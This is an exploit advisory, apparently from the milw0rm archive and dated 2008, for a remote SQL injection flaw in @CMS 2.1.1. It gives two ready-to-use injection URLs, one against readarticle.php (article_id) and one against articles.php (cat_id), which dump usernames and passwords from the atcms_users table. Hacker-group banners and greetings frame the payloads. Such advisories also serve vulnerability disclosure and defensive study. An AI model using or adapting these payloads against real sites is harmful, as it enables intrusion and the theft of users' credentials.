######################################################################### #################### Viva IslaM Viva IslaM ############################## ## ## Remote SQL Injection Vulnerability ## ## @CMS 2.1.1 ( readarticle.php article_id ) ## ######################################################################### ######################################################################### ## ## AuTh0r : Mr.SQL ## ## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM ## ## Email : SQL@Hotmail.it ## ## !! SYRIAN HaCkErS !! ######################## ######################## ## ## Script : @CMS 2.1.1 ## ## site : www.atcode.net ## ######################## ######################## ## -(:: SQL ::)- ## ## www.site.de/readarticle.php?article_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/* ## ## and ## ## www.site.com/articles.php?cat_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/* ## ####################### ####################### ####################################################################################################### ####################################################################################################### -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS :: ####################################################################################################### ####################################################################################################### # milw0rm.com [2008-06-21]